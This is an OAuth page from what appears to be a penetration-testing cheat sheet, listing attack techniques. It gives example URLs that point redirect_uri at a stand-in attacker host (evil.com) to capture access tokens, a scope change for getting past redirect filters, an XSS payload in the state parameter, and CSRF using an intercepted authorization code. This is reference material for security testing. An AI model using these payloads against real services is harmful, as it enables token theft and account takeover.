pwny.cc
  • Home
  • SO
    • AI
      • Evasion
        • Exercise 1
        • Exercise 2
        • Exercise 3
        • Exercise 4
    • Android
      • adb
      • apktool
      • burp suite
      • dns spoofing
      • frida
      • intent
      • jadx
      • JNI
      • objection
      • tcpdump
      • webview
    • iOS
      • objection
    • Linux
      • Internal Recon
      • Bypasses
      • Network
      • Exfiltration
      • Containers
      • Iptables
    • Windows
      • Internal Recon
      • External Recon
      • Bypasses
      • Network
      • Exfiltration
  • SHELLS
    • Misc
    • Web Shells
    • Reverse Shells
    • Obfuscated Shells
  • WEB ATTACKS
    • Misc
    • Command Injection
    • Cross-Site Scripting (XSS)
      • XSS Tips
      • WAF Bypasses
    • Insecure Direct Object Reference (IDOR)
    • Insecure File Upload
    • Local File Inclusion (LFI)
      • Bypass Techniques
      • LFI to RCE
    • OAuth
    • Open Redirect
      • Open Redirect to XSS
    • Server Side Request Forgery (SSRF)
    • Server Side Template Injection (SSTI)
    • SQL Injection (SQLi)
      • SQLMap
      • MySQL
      • MSSQL
      • Oracle
      • PostgreSQL
    • XML External Entity (XXE)
  • OTHER
    • Cracking
      • Hashcat
      • John the Ripper
    • Sandbox Escape
Powered by GitBook
On this page
  • Grabbing OAuth Token via redirect_uri
  • Executing XSS via redirect_uri
  • OAuth private key disclosure
  • Cross-Site Request Forgery

Was this helpful?

  1. WEB ATTACKS

OAuth

Grabbing OAuth Token via redirect_uri

Redirect to a controlled domain to get the access token.

https://www.example.com/signin/authorize?[...]&redirect_uri=https://demo.example.com/loginsuccessful
https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost.evil.com

OAuth implementations should never whitelist entire domains, only a few URLs so that "redirect_uri" can’t be pointed to an Open Redirect.

Sometimes you need to change the scope to an invalid one to bypass a filter on redirect_uri:

https://www.example.com/admin/oauth/authorize?[...]&scope=a&redirect_uri=https://evil.com

Executing XSS via redirect_uri

https://example.com/oauth/v1/authorize?[...]&redirect_uri=data%3Atext%2Fhtml%2Ca&state=<script>alert('XSS')</script>

OAuth private key disclosure

Some Android/iOS app can be decompiled and the OAuth Private key can be accessed.

Cross-Site Request Forgery

Applications that do not check for a valid CSRF token in the OAuth callback are vulnerable. This can be exploited by initializing the OAuth flow and intercepting the callback (https://example.com/callback?code=AUTHORIZATION_CODE). This URL can be used in CSRF attacks.

PreviousLFI to RCENextOpen Redirect

Last updated 3 years ago

Was this helpful?